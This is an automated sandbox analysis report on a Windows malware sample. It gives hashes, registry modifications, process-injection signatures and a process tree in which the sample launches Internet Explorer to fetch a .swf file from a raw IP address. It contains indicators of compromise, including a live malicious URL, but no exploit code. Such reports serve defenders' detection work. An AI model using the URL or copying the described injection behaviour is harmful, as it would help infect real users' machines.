Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
19/04/2024, 05:29
Static task
static1
Behavioral task
behavioral1
Sample
f99a2cebe321cec2cf20e2b5f81abd0a_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
f99a2cebe321cec2cf20e2b5f81abd0a_JaffaCakes118.exe
Resource
win10v2004-20240412-en
General
-
Target
f99a2cebe321cec2cf20e2b5f81abd0a_JaffaCakes118.exe
-
Size
36KB
-
MD5
f99a2cebe321cec2cf20e2b5f81abd0a
-
SHA1
8140d69a5f642a349b044fef0e80084457b4a276
-
SHA256
8e813961b7d3dac8bea46e871d06feec1c72a3952360701105d4d714584b7958
-
SHA512
a2a89cb80a383acfc1b64ffcbd553a25d1efd032b7a136c3b8b95b0500db605636fdecbc1d45a34fe0d14051d10d54f5e5b3eecb6a2629c3e994fc0a89d75606
-
SSDEEP
384:+5Ejv2GKD31KDZwcg3udulu++8tkgAZ/5xJS5OtpgZD9SLJKDZ8KD32PDW8:+5AvkMwca9U7gAR5u5OtW5sLQbeDV
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "419666439" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000c12c25e2ddfb54dbf19c8710c2306770000000002000000000010660000000100002000000017ee5805e52b3f6c447a8c9c7f65320c4f0ec3becd607933ba12e724ab24720b000000000e800000000200002000000050ea5f636b17dadb354ff2066809b126e7b808dd517c3c947e09f2f99c541de620000000becf285b30c324eedcf5d1f3868d764328f4c5b836893ec45d6d89e068ae9ff24000000050c7e2407715a7692dbffc378bae05e2af2cf10666946ac4dca2b82006ded0e55827c15dff5be5d7d9b674b89df87e88690b788718698293f98a8e56ed3c929a iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000c12c25e2ddfb54dbf19c8710c230677000000000200000000001066000000010000200000002e4cc534b66e2dc3d0fb26cceddd21ccf7a83866abc2891bd26fa78a3d5dbd98000000000e8000000002000020000000f3483f8f977b9500684169a08dc8da24df292d59141442c37f7ff87b24fc3d88900000008006dc35320dacf09085231dffa9cb252911f2b1a0c0d082edff6d2bb5f28376a8f03bd66f62803871cdaa8527b4575b1d99679436a27870a756d19119b4e5a3fbd6ca004ae8285d9d6475e391f342931612d639f8acd2af2e3accb22f1c2a88cecdb9c6e8498ea3c57be6a33792e038cbf65a91ce344b5bc70531182ca87cc83f7e1e7ac8aa5f0b01a221d3526fdb4340000000da98162b3aed4f67777e8d44bbe60241fe0a6055dba6079614ee08a599286ccdd64127b01b7a590cd513c0747e43005d8b3dc7061c6ba51ceb9ec474759e9995 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 909afbb91a92da01 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{CC40A291-FE0D-11EE-91D4-52ADCDCA366E} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1724 iexplore.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1732 f99a2cebe321cec2cf20e2b5f81abd0a_JaffaCakes118.exe 1724 iexplore.exe 1724 iexplore.exe 2576 IEXPLORE.EXE 2576 IEXPLORE.EXE 2576 IEXPLORE.EXE 2576 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1732 wrote to memory of 1808 1732 f99a2cebe321cec2cf20e2b5f81abd0a_JaffaCakes118.exe 28 PID 1732 wrote to memory of 1808 1732 f99a2cebe321cec2cf20e2b5f81abd0a_JaffaCakes118.exe 28 PID 1732 wrote to memory of 1808 1732 f99a2cebe321cec2cf20e2b5f81abd0a_JaffaCakes118.exe 28 PID 1732 wrote to memory of 1808 1732 f99a2cebe321cec2cf20e2b5f81abd0a_JaffaCakes118.exe 28 PID 2224 wrote to memory of 1724 2224 explorer.exe 30 PID 2224 wrote to memory of 1724 2224 explorer.exe 30 PID 2224 wrote to memory of 1724 2224 explorer.exe 30 PID 1724 wrote to memory of 2576 1724 iexplore.exe 31 PID 1724 wrote to memory of 2576 1724 iexplore.exe 31 PID 1724 wrote to memory of 2576 1724 iexplore.exe 31 PID 1724 wrote to memory of 2576 1724 iexplore.exe 31
Processes
-
C:\Users\Admin\AppData\Local\Temp\f99a2cebe321cec2cf20e2b5f81abd0a_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\f99a2cebe321cec2cf20e2b5f81abd0a_JaffaCakes118.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe http://200.221.3.168/h/toon/pian_086.swf2⤵PID:1808
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://200.221.3.168/h/toon/pian_086.swf2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1724 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2576
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD56ca6d66479dd4174402928517431d738
SHA161d3dc9e987d2d5027b843cb694de4c9cb51edd9
SHA256f30e1d73d2100da59aa1dec13caf1f00e0228e7e350ad8f0c5c353466c40e610
SHA5128e1c8861987d0ebae11afb616c450c89e23426d64fcc1b251e7e8e77f21f7d47e206e18ad314d841559773a4f45819a4cfc7116cd0795c2a734a14a64d9ccd78
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD576c8ceb7f07dd7d6b5582a13fc0aa158
SHA12f0ba3d68a6cf5d96db8858ae20ad4104a94c2a3
SHA256ec77ab173a01a645dc7d5421d0f9dc33b608e3519be42a2c197f191de52afefe
SHA512cc8a571f740d0cf078743e212f89db5c18f927a77e39207c2be9f70c36e0d2cdb8c8a8bdd5a1b3f9276db7a6997ddc0769e8dd133e0442fa83d0550910bd7490
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5f4ce3efdc2774dc3d0111954ccc0d1e7
SHA1dd84c5c89e08a153d55ab1f40e5e7b13f6b04269
SHA256139bc35655b5ea59395a1a5a13f79a339a2ce12597b29b3af1e9f4b001873be0
SHA5121c63608fced2c43cae845c95ca74f11f6f7e7bd28b37a881f523b07b418b8a27e9946ad0dc9f175455226df572743264c5f885f96fcee08ebd977d77f4bb2d95
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD501277b2eed35452e57fb65ef2f2723e8
SHA14eb44184bee5cc068737da0ced088f96fcd84784
SHA256bc06d1a649b5d8f5a72ba968616a6fe2a6ac4e3490b8f91e59f663a18975a9f5
SHA512ebda7e57b9fdf4b901665ed765c821765c288960a7c8fdbe666c057dc2d0cd9519001eb127dc13501324daf2650273959d27aeaf5880ae0afebae2def8acedc1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD542701e7e8115cbecf53e9c2ad2a86749
SHA108c6df1805ad11732bd6e62dce81bf1c02ed5758
SHA256d15c95a78db4333d2003b7ea626952cb0c55fcd14e751e47e240721c0d1d6df6
SHA51249c2aafd30a25ad71612efbd196b18de16a413571b5936d973217d7c958670a993a8a7901b3899ce7e78e41d9d7ace3288130ba3487fcdc7300bf1f66e2e4e26
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD54825df4504625a379ac308a09eb4b8a4
SHA1569ee8fe63fc0aa6708511737d82c31e7e6ce10e
SHA256c966f73ab7deb45529f712ad4967003ff235d1ccb2eecb8a4413cea944145969
SHA512df525f300c3ae094b8b13b04767c02c53d6ed65ccc6577dab9df667739d6fb5e0b7001f2ad8f2e6e0090851b7b54007ad04d3037eb48423487edd94edf3fa712
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD580bd7467a3e3dc0f321aacd2f502d9cf
SHA118d7794d2084503c000199702b99d1683a33223d
SHA25627586935833a6bcbd4ec12542f15cff4c117bfa8e8027d8924a15434e6c5f68d
SHA512e4eeafacc2ec1f16076f81a2eeb6bfe69b4b9395c9eca6e618fedac2128a021d78a50185b7591e32be59d4e912c2e7922bc557593d87b4218921391378193a02
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5aedc435d5c1d67113e8688bb86c6f66a
SHA1ac9da21d25227e1e268e6bbcc7fac3863f87875f
SHA2566a4d3832726829e8455ad2c6c50ae0e0072cae2e1b8c1f8933de026fdb47ed4f
SHA512f1a07ef00882eb2db5af1d488c1be715bf9bc351c246eac06dc62e026f4f1e2e6e84b2006700fcbb4993bcef7260b06cc960e8c1c42882226230938dab126cfc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5f8874d210291cfecd7bcccede6beb8b0
SHA1f6caafa9b5a0122e3f3764e69c5bccbc1145e510
SHA2564d4ad41cb4b551ec1c21ed6f785125f30a0a2e3f8f065543514690bd948da0ff
SHA512940551a198333ac458437fd5d5492e6627cb44972cbb8a4a4779828fa1fcb7c6d6debd1d1d1fc99accba5965d7939a6b0674a80a9bbb5524674e81fb4ab1d33f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD50eb9c5044c7aa1fdb51ff93ff39621f0
SHA11e1be42c643f688f0f2ffc73a4198bf6a6740b95
SHA256af22de4b16ed108931cf5786a0feb5864a420002371de523c87b939e5834c576
SHA5123c21cc1c482b1fa505e98089c737d7280da4895411e38819f2db2fe9f611e017d675b4915d30f71145edd9831826fb4ca4bee1d17e8309fbf4946c62aba9efd6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD572b8540d1a374c8d03d3b0b55cfdcb1f
SHA114f9322f410800952378d99005bc0293ebb9ef66
SHA256ffb5bd003fb1b20e00f5abbb2e63d51c2ca0bd3a2b90fb548c9fc5905be6ef82
SHA5125c7a7e46d878693a4b043dd1eb9f4459e8fd790a5ad48379fd89ffa280ddf76bb0beeff53550df7c38e1a570367ec8548c3a9b90575bf0547a43e66e9c0ab67d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5e14c6c4a146c14bfa48d0f575b06abae
SHA11df6748a6e459fb4be489d2188790353bfa63176
SHA25602fd56053cc4dde0b14a1d17f99e468c347f2eba6fec363c8e5fb953661cbb96
SHA512ea3e0448d6593e829485cb6fc9274806036afceaaf293822fcb51b4958213bb908c22174e9f9162803345c3b3deeb9eeea267f5707057dd0f1bba228037a2499
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD58c07745fe241c9d2e8bb94ff68740929
SHA1cdd15b1ed311967d743adc5edac4af48066b937b
SHA256dc8c3b4484df5e1993a4aa03c27e02afc9705de0ed30cb186d69bc21a40880b0
SHA512e82bd3eabbe5abd6efa5efd89815a0d8cf5bea99efd8bb618cea074df7e0503ccf70c85aa7559057642b28b52e2f440131cb6b217b703ae1c20e4d93b99d4999
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD537b8c221a4f00f79264849a4431a7d7d
SHA19e72f1fc0cd67b90a68448e52002f43a0a7c1d1c
SHA2565b5ee1ec1092366f7c8f78fdfd55f914723bdaf783171ffc8f12fb8fce2a3f59
SHA512849e4d3d8f591df744425fd452dfd1c0d53e2a52944439706e7051692f23f22b48e7de1b6d8211f77f22764c26a48050c91f48d77642845c99be264df10bc973
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD51b11bc0b0968aae33d97402c49c68284
SHA1ace4fecc2e7f3d7d911d8007b34c78ab1add7449
SHA2563e5ec7ec147d7e5f54861a6b9d294149b5591c841decd734a3781e9f20873a8f
SHA512729d8c8266609789c92c9d4900f700d03893175deffa12156dd50168fc215d30e9287891a4ca82b388502609cd2e6342eb352ac14c79a815ab675206c15aa256
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD52661faf81ce6b9132d21086b99d8a241
SHA1bdcafa6d2c735f0d8ae51ab2d911333a97d626f3
SHA2566dd9d3ded5addce6029876de3e470e7e09173685c85b2a5222269157d3d8f4f3
SHA51205625ab99f3d28cade232719ef121bc07443c521020bcba5655270303dfd756bad93be38f2bab8b50e6c071b78ba3e1c6f2b76bae39f06d292136bb5cfa6afc8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5838ac01cfd5898285adb5d226d90a32e
SHA145836638f08c41c017a11a8103b7b001798946b5
SHA2566290839ec1ef5d23ce4d64264a9dfe25b925ba37b7f4cde10a806e2e18f4f751
SHA51292c6c3ff77c22f455ef1a5593c60b5c30c56c0bf63774e691c8aadd20fb8407f1f9b0d20ad2e71783e619514ef976998bb0a89caf25e41536b926daaba523936
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD50c120bbd9f831822f86ec7baede6a03f
SHA18d0801ff705e985bb921f3d7abd9904602ce62d0
SHA25695d669b182ea9e31c17657c807b3076a8d011df0379724955243e18321c9ddd2
SHA512ea135ddbd70f343ebe86b78fc0e65c894c1b4f760e8e8d7881b9a50ef3515203e85012bba990a1d0cce399c0b611e2d5ecce07e17c22dd756f0477711be7915f
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a